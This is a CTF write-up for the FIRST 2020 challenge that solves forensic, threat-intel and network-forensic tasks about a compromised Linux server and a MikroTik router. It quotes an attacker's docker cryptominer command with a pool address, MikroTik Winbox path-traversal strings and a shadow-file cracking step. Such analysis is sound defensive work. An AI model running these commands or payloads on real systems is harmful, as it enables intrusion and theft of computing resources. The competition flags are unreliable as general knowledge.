Write-up: FIRST 2020 CTF Challenge

 

Hey. A CTF online competition organized by U.S. Department of Homeland Security’s (DHS) Cybersecurity & Infrastructure Security Agency (CISA) was ended yesterday (27/6).

This post will going through all challenges that my team solved. Let’s go.

Tools used:

  1. FTK Imager
  2. Linux terminal
  3. Online tools
  4. Wireshark

Forensics

For this category, organizer gave us a .dd file of compromised linux machine named hacked.dd. Challenges 1-7 will be use this dd image to answer all the questions (flag).

Open up the .dd file in FTK Imager will help us a lot to go through this category.

Challenge 1

enter image description here

To monitor system logins, one of the important file we should monitor is auth.log reside in /var/log. As you can see in FTK imager ss below:

We then dump the auth.log into our local machine, and start analyse it with our text editor (vs code) :p

As we see below, there’s a lot (ton) of attempts to login but failed from IP 45.62.224.162. It may a bruteforce attack was launched by the attacker.

Scrolling down little bit, and we can see that the attacker successfully get into the machine.

Mar 10 06:55:01 dockersrv sshd[1997]: Accepted password for jdoe from 45.62.224.162 port 37488 ssh2
Mar 10 06:55:01 dockersrv sshd[1997]: pam_unix(sshd:session): session opened for user jdoe by (uid=0)
Mar 10 06:55:01 dockersrv systemd: pam_unix(systemd-user:session): session opened for user jdoe by (uid=0)
Mar 10 06:55:01 dockersrv systemd-logind[803]: New session 3 of user jdoe.
Mar 10 06:55:51 dockersrv sudo:     jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/bin/su -
Mar 10 06:55:51 dockersrv sudo: pam_unix(sudo:session): session opened for user root by jdoe(uid=0)
Mar 10 06:55:51 dockersrv su[2105]: Successful su for root by root
Mar 10 06:55:51 dockersrv su[2105]: + /dev/pts/0 root:root
Mar 10 06:55:51 dockersrv su[2105]: pam_unix(su:session): session opened for user root by jdoe(uid=0)
Mar 10 06:55:51 dockersrv su[2105]: pam_systemd(su:session): Cannot create session: Already running in a session
Mar 10 06:56:05 dockersrv groupadd[2122]: group added to /etc/group: name=hack3rman, GID=1001
Mar 10 06:56:05 dockersrv groupadd[2122]: group added to /etc/gshadow: name=hack3rman
Mar 10 06:56:05 dockersrv groupadd[2122]: new group: name=hack3rman, GID=1001
Mar 10 06:56:05 dockersrv useradd[2126]: new user: name=hack3rman, UID=1001, GID=1001, home=/home/hack3rman, shell=/bin/bash
Mar 10 06:56:21 dockersrv passwd[2134]: pam_unix(passwd:chauthtok): password changed for hack3rman
Mar 10 06:56:26 dockersrv chfn[2135]: changed user 'hack3rman' informatio

It start to create user hack3rman and do his “things” after that.

Flag: 45.62.224.162

Challenge 2

enter image description here

As we see in the auth.log, sshd service accepted password from user jdoe from attacker IP (45.62.224.162) is on Mar 10 06:55:01.

Flag: Mar 10 06:55:01

Challenge 3

enter image description here

The use that has been compromised was jdoe

Flag: jdoe

Challenge 4

enter image description here

So, the organizer ask us to retrieve jdoe password.

To crack jdoe’s password, we need to take /etc/shadow file and crack it with John.

So, we dumped /etc/shadow to our local machine and start crack the hash using John in my Kali terminal bash in Windows.

$ john shadow

User jdoe use an easy password for his account, therefore the process to crack and bruteforce will be fast and easy!

Flag: 123456

Challenge 5

enter image description here

As we monitored the log, we’ve seen that the attacker created a user named hack3rman.

Flag: hack3rman

Challenge 6

enter image description here

Now, we need to retrive the command used by attacker to make his profit in our hacked server. We can found history of commands used by user (unless user deleted it) in /home/<user>/.bash_history. The .bash_history file tracks a user’s command history and is an important artifact in Linux and Mac forensics. Suspects may attempt anti-forensic techniques to corrupt or remove .bash_history content. In our case, the attacker is not remove this important files. Therefore, we can track it’s command.

As we see, the attacker try to run a crypto-miner in the compromised server.

Flag: sudo docker service create --name miner alexellis2/cpu-opt:2018-1-2 ./cpuminer -a hodl -o stratum+tcp://hodl.eu.nicehash.com:3352 -u 35THoNiL8vNCESSq5ZPmZYTHT1GymWvUAx.autopsit.org

Threat Intel

Challenge 1

enter image description here

Now we already know the IP (45.62.224.162). Let’s use online tools to investigate the hoster name and it’s country. I’ll this website to define the hosting and the country.

Flag: cloudatcost/canada

Network Forensic

Challenge 1

Run the pcap file in Wireshark and we can see the IP.

Flag: 172.16.100.223

Challenge 2

Flag: 172.16.100.1

Challenge 3

The organizer ask us about the exploit that have been used that captured in this traffic.

I first investigate the pcap by running Follow TCP streams on the 2nd packet.

The result output display to me of some readable strings that could lead us to the clue. One of the strings that interested me is //./.././.././../flash/rw/store/user.dat. After doing some research in Google. The exploit that been used by the attacker is related to MiktoTik RouterOS exploit.

So the challenge ask us for three things.

  1. Brand name
  2. Service name
  3. Port number

As you know by research on the Google, the brand name should be MikroTik. The service name should be Winbox as we read this blog article.

To identify the port number, we can expand the information in Wireshark at 2nd packet of the pcap file.

Flag: MikroTik/Winbox/8291

Challenge 4

This flag can be found based on our Google-Fu back then hehe

Flag: CVE-2018-14847

Challenge 5

Running strings command on the pcap file will gave us some interesting strings.

!(//./.././.././../flash/rw/store/user.dat
4Xb@
eXc@
systemadminadminM
systemadminb
system default user
adminQ
masterofmastersa
masterofmastersi
masterofmasters@
4Xe@
4N/@
mN0@
+/z(}I
.#p}@
masterofmasters	
+/z(}I
.#p}
3.11
default
i386
//./.././.././../pckg/option
]N2@
ocgI
ocgI
!+//./.././.././../flash/nova/etc/devel-login
]N3@
4N4@
MikroTik
6.39.3 (bugfix)
MikroTik
	5FJC-D9NE
ether2I

The right username is masterofmasters

Flag: masterofmasters

Challenge 7

The organizer gave us another Pcap file and we need to find flag.

Run strings command on the pcap will reveal us a dash-dot strings which refer to morse code.

Decode it using online morse code decoder, https://www.boxentriq.com/code-breaking/morse-code and you will get the sweet little flag.

Flag: 1F1909053CB46624